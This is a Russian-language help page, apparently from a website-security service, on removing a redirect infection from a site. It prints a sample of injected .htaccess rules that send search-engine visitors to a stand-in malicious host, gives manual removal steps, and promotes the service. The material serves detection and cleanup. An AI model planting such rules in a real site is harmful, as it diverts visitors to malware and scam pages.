Как обезвредить вирус редирект на сайте

Вирус редирект на сайте

Вирусдай позволяет удалить вирус-редирект с вашего сайта. Редирект – это перенаправление пользователя на сторонний сайт при попытке просмотра страниц исходного сайта. Обычно такие редиректы перенаправляют пользователей на сайты, откуда происходит распространение вредоносного или мошеннического ПО (например, под видом обновления к веб-браузеру). Загрузка и установка таких программ может привести к заражению компьютера или вашего мобильного устройства.

В большинстве случаев, вредоносный код прописывается в файле .htaccess, лежащем в корне вашего сайта. Вредоносный код, часто выглядит следующим образом:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*yandex.* [OR]
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteRule ^(.*)$ http://maliciouswebsite.net/index.php?t=6 [R=301,L]

Такие правила редиректа будут перенаправлять пользователей с поисковых систем Яндекс, Гугл и Бинг на сайт maliciouswebsite.net.
Часто распространены мобильные редиректы, влияющие только на пользователей, посещающих ваш ресурс с мобильных устройств.

Лечение от вируса

Мы рекомендуем воспользоваться сервисом Вирусдай, умеющим автоматически находить и удалять вредоносные редиректы. Если вы хотите произвести удаление вручную — инструкции следующие:
1. Установите соединение со своим сайтом через файл-менеджер по FTP
2. Найдите файл .htaccess в корневом каталоге сайта
3. Удалите вредоносный код и сохраните файл

Теперь, когда редирект удален, вы, казалось бы, можете вздохнуть спокойно, однако, вы не знаете как и кем он был помещен в ваш файл и уж точно не знаете повторится ли это снова, однако, вы явно подозреваете, что да. Осталось постараться найти уязвимость, через которую лоумышленникам удалось проникнуть в файлы вашего сайта. Вирусдай может находить и уничтожать шеллы, дающие злоумышленникам полный доступ к вашим файлам.

Вирус редирект в PHP-файлах

Есть разновидности редиректов, которые любят прописываться не только в самом файле .htaccess, но также, легко позволяют себе прописаться во множестве (сотни или тысячи файлов) PHP файлов. В явном виде вы не сможете обнаружить такую вредоносную строку в файлах, однако, при запуске любого из PHP файлов редирект на вашем сайте будет снова возникать. Для полного устранения вирусда редиректа рекомендуем использовать сервис Вирусдай. Вирусдай обнаруживает и удаляет редиректы в .htaccess и файлах *.php.

Команда сервиса Вирусдай.